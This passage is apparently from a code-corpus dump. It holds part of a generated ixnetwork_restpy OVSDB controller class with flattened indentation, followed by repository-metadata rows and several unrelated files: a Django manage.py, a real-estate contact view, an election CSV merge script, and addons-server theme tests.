- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
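    # Illustrative sketch (not part of the generated code): plain attributes are set
    # through update(), while Multivalue-typed attributes are configured on the
    # returned Multivalue object. The Single() helper used below is assumed from
    # ixnetwork_restpy's Multivalue class; check the version you have installed.
    #
    #   ovsdb.update(Name='ovsdb-ctrl-renamed', TimeOut=180)
    #   ovsdb.OvsdbServerIp.Single('10.0.0.1')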
def add(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Adds a new ovsdbcontroller resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
        - EnableLogging (bool): If true, Port debug logs will be recorded; maximum recording will be up to 500 MB.
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
        - ServerAddDeleteConnectionError (str): API to retrieve error occurred while Adding/Deleting Server
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with all currently retrieved ovsdbcontroller resources using find and the newly added ovsdbcontroller resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained ovsdbcontroller resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, EnableLogging=None, Errors=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, PseudoMultiplier=None, PseudoMultiplierBfd=None, PseudoMultiplierVxlanReplicator=None, Role=None, ServerAddDeleteConnectionError=None, ServerAddDeleteStatus=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
"""Finds and retrieves ovsdbcontroller resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ovsdbcontroller resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ovsdbcontroller resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
        - EnableLogging (bool): If true, Port debug logs will be recorded; maximum recording will be up to 500 MB.
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoMultiplier (number): Multiplier for GUI-only connection
- PseudoMultiplierBfd (number): Multiplier for GUI-only connection
- PseudoMultiplierVxlanReplicator (number): Multiplier for GUI-only connection
- Role (list(str[master | none | slave])): The role of the OVSDB Controller.
        - ServerAddDeleteConnectionError (str): API to retrieve error occurred while Adding/Deleting Server
- ServerAddDeleteStatus (str): Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
        - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with matching ovsdbcontroller resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
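    # Illustrative sketch (not part of the generated code): find() evaluates the named
    # parameters as regex on the server, so anchor with ^ and $ for an exact match;
    # `parent` and the values below are invented.
    #
    #   every_ctrl = parent.Ovsdbcontroller.find()
    #   one_ctrl = parent.Ovsdbcontroller.find(Name='^ovsdb-ctrl-1$')
    #   started_ctrls = parent.Ovsdbcontroller.find(Status='^started$')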
def read(self, href):
"""Retrieves a single instance of ovsdbcontroller data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ovsdbcontroller resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def AddServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the addServer operation on the server.
Add Server.
addServer(Arg2=list, async_operation=bool)list
----------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('addServer', payload=payload, response_object=None)
def ClearLastErrors(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearLastErrors operation on the server.
Clear Error Messages reported due to Last Action.
clearLastErrors(Arg2=list, async_operation=bool)list
----------------------------------------------------
- Arg2 (list(number)): List of indices for which to clear last reported error messages.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearLastErrors', payload=payload, response_object=None)
def ClearPortLogs(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearPortLogs operation on the server.
Add Server.
clearPortLogs(Arg2=list, async_operation=bool)list
--------------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearPortLogs', payload=payload, response_object=None)
def ControllerDumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the controllerDumpDB operation on the server.
Command to fetch Tor Information stored internally.
controllerDumpDB(Arg2=list, async_operation=bool)list
-----------------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('controllerDumpDB', payload=payload, response_object=None)
def DeleteServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the deleteServer operation on the server.
Delete Server.
deleteServer(Arg2=list, async_operation=bool)list
-------------------------------------------------
- Arg2 (list(number)): List of indices for which to Delete Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('deleteServer', payload=payload, response_object=None)
def DumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the dumpDB operation on the server.
Attach.
dumpDB(Arg2=list, async_operation=bool)list
-------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('dumpDB', payload=payload, response_object=None)
def GetServerAddDeleteStatus(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the getServerAddDeleteStatus operation on the server.
Get Server Status.
getServerAddDeleteStatus(Arg2=list, async_operation=bool)list
-------------------------------------------------------------
- Arg2 (list(number)): List of indices for which to get Server Status.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getServerAddDeleteStatus', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
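    # Illustrative sketch (not part of the generated code): the overloads documented
    # above are selected by the arguments supplied; the session numbers are invented.
    # The same pattern applies to Stop(), Abort() and RestartDown().
    #
    #   ovsdb.Start()                             # all sessions
    #   ovsdb.Start(SessionIndices=[1, 2, 3])     # list form
    #   ovsdb.Start(SessionIndices='1-4;6;7-12')  # string-range form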
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, ClearDumpDbFiles=None, ConnectionType=None, ControllerTcpPort=None, DirectoryName=None, DumpdbDirectoryName=None, EnableOvsdbServerIp=None, ErrorCode=None, ErrorDesc=None, ErrorLogDirectoryName=None, ErrorLogicalSwitchName=None, ErrorPhysicalSwitchName=None, ErrorTimeStamp=None, FileCaCertificate=None, FileCertificate=None, FileHWGatewayCertificate=None, FilePrivKey=None, HSCConfiguration=None, OvsdbSchema=None, OvsdbServerIp=None, ServerConnectionIp=None, TableNames=None, VerifyHWGatewayCertificate=None, VerifyPeerCertificate=None):
"""Base class infrastructure that gets a list of ovsdbcontroller device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- ClearDumpDbFiles (str): optional regex of clearDumpDbFiles
- ConnectionType (str): optional regex of connectionType
- ControllerTcpPort (str): optional regex of controllerTcpPort
- DirectoryName (str): optional regex of directoryName
- DumpdbDirectoryName (str): optional regex of dumpdbDirectoryName
- EnableOvsdbServerIp (str): optional regex of enableOvsdbServerIp
- ErrorCode (str): optional regex of errorCode
- ErrorDesc (str): optional regex of errorDesc
- ErrorLogDirectoryName (str): optional regex of errorLogDirectoryName
- ErrorLogicalSwitchName (str): optional regex of errorLogicalSwitchName
- ErrorPhysicalSwitchName (str): optional regex of errorPhysicalSwitchName
- ErrorTimeStamp (str): optional regex of errorTimeStamp
- FileCaCertificate (str): optional regex of fileCaCertificate
- FileCertificate (str): optional regex of fileCertificate
- FileHWGatewayCertificate (str): optional regex of fileHWGatewayCertificate
- FilePrivKey (str): optional regex of filePrivKey
- HSCConfiguration (str): optional regex of hSCConfiguration
- OvsdbSchema (str): optional regex of ovsdbSchema
- OvsdbServerIp (str): optional regex of ovsdbServerIp
- ServerConnectionIp (str): optional regex of serverConnectionIp
- TableNames (str): optional regex of tableNames
- VerifyHWGatewayCertificate (str): optional regex of verifyHWGatewayCertificate
- VerifyPeerCertificate (str): optional regex of verifyPeerCertificate
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
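    # Illustrative sketch (not part of the generated code): the optional regex
    # parameters narrow the returned device ids; the port name and IP are invented.
    #
    #   device_ids = ovsdb.get_device_ids(PortNames='^Port 1$',
    #                                     OvsdbServerIp=r'^10\.0\.0\.1$')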
| [
"pdobrinskiy@yahoo.com"
] | pdobrinskiy@yahoo.com |
ee6e1bdad63bc6a6d29628edf3690192dd546726 | 1cbe5354da423041dc23621c67c206c9f1ae96b3 | /Source/os_sim/manage.py | 2f841b59d685b075582cb7afceabec6b4dee6ba6 | [] | no_license | ayush113/OS-Simulator | 4bf4b42f34f15976d926b43439695fc089426b76 | 3bba2891c8e5d84bb95ccaa72980da0326a77448 | refs/heads/master | 2021-03-19T15:31:38.355198 | 2018-04-11T12:09:54 | 2018-04-11T12:09:54 | 123,108,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "os_sim.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"ayush.kumar1999@gmail.com"
] | ayush.kumar1999@gmail.com |
6c2f8675a34b2202e7559088098d3f390f73c1c2 | d37f88df7d8f198b26ba32fe8c34ea8357db2c58 | /contacts/views.py | 4c9745ab38acdae623a4d274ff14c640e21eeb4d | [] | no_license | JakeTheReaper/BTRE_DjangoProject | abfe09176545d3eed72a521ac983fd95a8d1d62a | 30110ada9ef15953ea800df880abe268ec9fc5a6 | refs/heads/master | 2023-04-30T04:18:54.151467 | 2019-08-27T09:15:32 | 2019-08-27T09:15:32 | 203,151,290 | 0 | 0 | null | 2023-04-21T20:36:37 | 2019-08-19T10:30:56 | CSS | UTF-8 | Python | false | false | 1,619 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.core.mail import send_mail
from .models import Contact
def contact(request):
if request.method == 'POST':
listing_id = request.POST['listing_id']
listing = request.POST['listing']
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
message = request.POST['message']
user_id = request.POST['user_id']
realtor_email = request.POST['realtor_email']
# Check if user has made inquiry already
if request.user.is_authenticated:
user_id = request.user.id
has_contacted = Contact.objects.all().filter(listing_id=listing_id, user_id=user_id)
if has_contacted:
messages.error(request, 'You have already made an inquiry for this listing')
return redirect('/listings/' + listing_id)
contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email, phone=phone,
message=message, user_id=user_id)
contact.save()
# Send email
send_mail(
'Property Listing Inquiry',
'There has been an inquiry for ' + listing + '. Sign into the admin panel for more info',
'jake.zerafa86@gmail.com',
[realtor_email, 'jake.zerafa86@gmail.com'],
fail_silently=False
)
messages.success(request, 'Your request has been submitted, a realtor will get back to you soon')
return redirect('/listings/'+listing_id)
| [
"jake.zerafa86@gmail.com"
] | jake.zerafa86@gmail.com |
b7bad42217740964a6c56c458b83e77dcb6f7ac0 | 22102fe3aadaabb967b9a0e33af5ea624afdaa38 | /merge.py | 6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d | [
"MIT"
] | permissive | tecoholic/Election2021 | 1c840a0e7ba23c885ca07ab9e676087fb312189f | 0b3fb8930d09883f5b58584f6f14b02d30788cbf | refs/heads/main | 2023-04-30T22:20:37.406868 | 2021-05-14T11:17:16 | 2021-05-14T11:17:16 | 363,843,846 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import os
import pandas as pd
states = {
"AS": 126,
"KL": 140,
"PY": 30,
"TN": 234,
"WB": 294
}
def get_code(party):
if party.lower() == "none of the above":
return "NOTA"
party = party.replace("of ", "") # handle CPIM
parts = party.split(" ")
parts = [p.strip() for p in parts]
return "".join(p[0] if not p.startswith("(") else p[0:2]+p[-1] for p in parts).upper()
def main():
for state in states:
print("Merging files of ", state)
base_dir = os.path.join("may2021", state)
df = None
for i in range(1, states[state] + 1):
filename = os.path.join(base_dir, f"{i}.csv")
try:
data = pd.read_csv(filename)
except FileNotFoundError:
print("Cannot find file: ", filename)
continue
data["AC_NO"] = i
data["Position"] = data["Total Votes"].rank(
ascending=False).astype('int')
data["Party Code"] = data["Party"].apply(get_code)
if df is None:
df = data
else:
df = df.append(data)
fname = os.path.join(base_dir, "all_candidate.csv")
df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
| [
"arun@arunmozhi.in"
] | arun@arunmozhi.in |
963b9d86d12b307ab607ada7da6ae7a4f04c14d5 | c7f44f6fd55fe65270012fabc6c0d70b505134b2 | /src/olympia/versions/tests/test_utils.py | 93bce22e3517d132a63f362c6417bcc53e12d78d | [] | permissive | sayantanu-dey/addons-server | 84b25bbd4497ad6323bb189354afd4b219ce659c | 1c051e755b037dfac3f2bf128b481e932be6832e | refs/heads/master | 2020-09-02T08:29:40.403706 | 2019-11-07T16:24:59 | 2019-11-07T16:24:59 | 219,175,878 | 1 | 0 | BSD-3-Clause | 2019-11-02T15:48:55 | 2019-11-02T15:48:54 | null | UTF-8 | Python | false | false | 9,271 | py | import json
import math
import os
import shutil
import tempfile
import zipfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.test.utils import override_settings
from unittest import mock
import pytest
from PIL import Image, ImageChops
from olympia import amo, core
from olympia.amo.tests import addon_factory, TestCase, user_factory
from olympia.files.tests.test_utils_ import AppVersionsMixin
from olympia.versions.utils import (
AdditionalBackground, new_69_theme_properties_from_old,
new_theme_version_with_69_properties, process_color_value, write_svg_to_png
)
@pytest.mark.parametrize(
'filename', (('weta_theme_full'), ('weta_theme_list'))
)
def test_write_svg_to_png(filename):
# If you want to regenerate these, e.g. the svg template has significantly
# changed, you can grab the svg file from shared_storage/tmp - when
# settings.DEBUG==True it's not deleted afterwards.
# Output png files are in shared_storage/uploads/version-previews/full
# and /thumbs.
svg_xml = os.path.join(
settings.ROOT,
'src/olympia/versions/tests/static_themes/%s.svg' % filename)
svg_png = os.path.join(
settings.ROOT,
'src/olympia/versions/tests/static_themes/%s.png' % filename)
with storage.open(svg_xml, 'rb') as svgfile:
svg = svgfile.read()
try:
out_dir = tempfile.mkdtemp()
out = os.path.join(out_dir, 'a', 'b.png')
write_svg_to_png(svg, out)
assert storage.exists(out)
# compare the image content. rms should be 0 but travis renders it
# different... 3 is the magic difference.
svg_png_img = Image.open(svg_png)
svg_out_img = Image.open(out)
image_diff = ImageChops.difference(svg_png_img, svg_out_img)
except Exception as e:
raise e
finally:
shutil.rmtree(out_dir)
sum_of_squares = sum(
value * ((idx % 256) ** 2)
for idx, value in enumerate(image_diff.histogram()))
rms = math.sqrt(
sum_of_squares / float(svg_png_img.size[0] * svg_png_img.size[1]))
assert rms < 3
@pytest.mark.parametrize(
'alignment, alignments_tuple', (
('center bottom', ('center', 'bottom')),
('top', ('center', 'top')),
('center', ('center', 'center')),
('left', ('left', 'center')),
('', ('', ''))
)
)
def test_additional_background_split_alignment(alignment, alignments_tuple):
assert AdditionalBackground.split_alignment(alignment) == alignments_tuple
@mock.patch('olympia.versions.utils.encode_header')
@pytest.mark.parametrize(
'alignment, tiling, image_width, image_height, ' # inputs
'pattern_width, pattern_height, pattern_x, pattern_y', # results
(
# these are all with a small image than the svg size
('center bottom', 'no-repeat', 120, 50,
680, 92, 280, 42),
('top', 'repeat-x', 120, 50,
120, 92, 280, 0),
('center', 'repeat-y', 120, 50,
680, 50, 280, 21),
('left top', 'repeat', 120, 50,
120, 50, 0, 0),
# alignment=None is 'right top'
(None, 'repeat', 120, 50,
120, 50, 560, 0),
# tiling=None is 'no-repeat'
('center', None, 120, 50,
680, 92, 280, 21),
# so this is alignment='right top'; tiling='no-repeat'
(None, None, 120, 50,
680, 92, 560, 0),
# repeat with a larger image than the svg size
('center bottom', 'no-repeat', 1120, 450,
1120, 450, -220, -358),
('top', 'repeat-x', 1120, 450,
1120, 450, -220, 0),
('center', 'repeat-y', 1120, 450,
1120, 450, -220, -179),
('left top', 'repeat', 1120, 450,
1120, 450, 0, 0),
# alignment=None is 'right top'
(None, 'repeat', 1120, 450,
1120, 450, -440, 0),
# tiling=None is 'no-repeat'
('center', None, 1120, 450,
1120, 450, -220, -179),
# so this is alignment='right top'; tiling='no-repeat'
(None, None, 1120, 450,
1120, 450, -440, 0),
)
)
def test_additional_background(
encode_header_mock, alignment, tiling, image_width, image_height,
pattern_width, pattern_height, pattern_x, pattern_y):
encode_header_mock.return_value = (
'foobaa', image_width, image_height)
path = 'empty.png'
background = AdditionalBackground(path, alignment, tiling, None)
assert background.src == 'foobaa'
assert background.width == image_width
assert background.height == image_height
background.calculate_pattern_offsets(
amo.THEME_PREVIEW_SIZES['header']['full'].width,
amo.THEME_PREVIEW_SIZES['header']['full'].height)
assert background.pattern_width == pattern_width
assert background.pattern_height == pattern_height
assert background.pattern_x == pattern_x
assert background.pattern_y == pattern_y
@pytest.mark.parametrize(
'manifest_property, manifest_color, firefox_prop, css_color', (
('bookmark_text', [2, 3, 4], 'bookmark_text', 'rgb(2,3,4)'),
('frame', [12, 13, 14], 'frame', 'rgb(12,13,14)'),
('textcolor', 'rgb(32,33,34)', 'tab_background_text', 'rgb(32,33,34)'),
('accentcolor', 'rgb(42, 43, 44)', 'frame', 'rgb(42,43,44)'),
('toolbar_text', 'rgb(42,43,44)', 'bookmark_text', 'rgb(42,43,44)'),
)
)
def test_process_color_value(manifest_property, manifest_color, firefox_prop,
css_color):
assert (firefox_prop, css_color) == (
process_color_value(manifest_property, manifest_color))
class TestNew69ThemeProperties(AppVersionsMixin, TestCase):
file_obj_dep = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
def setUp(self):
self.call_signing_mock = self.patch(
'olympia.lib.crypto.signing.call_signing')
self.call_signing_mock.return_value = 'abcdefg1234'
def test_new_69_theme_properties_from_old(self):
old = {
'theme': {
'colors': {
'accentcolor': '#dfa672',
'textcolor': '#fff',
'toolbar_text': 'rgb(0,12,34)',
},
'images': {
'headerURL': 'path/to/image'
}
}
}
new_ = new_69_theme_properties_from_old(old)
assert new_ == {
'theme': {
'colors': {
'frame': '#dfa672',
'tab_background_text': '#fff',
'bookmark_text': 'rgb(0,12,34)',
},
'images': {
'theme_frame': 'path/to/image'
}
}
}
def test_new_69_theme_properties_from_old_no_overwrite(self):
old = {
'theme': {
'colors': {
'accentcolor': '#dfa672',
'textcolor': '#fff',
'toolbar_text': 'rgb(0,12,34)',
'frame': '#672',
'tab_background_text': '#eee',
'bookmark_text': 'rgb()',
},
'images': {
'headerURL': 'path/to/image',
'theme_frame': 'path/to/otherimage',
}
}
}
new_ = new_69_theme_properties_from_old(old)
assert new_ == old
@override_settings(ENABLE_ADDON_SIGNING=True)
def test_new_theme_version_with_69_properties(self):
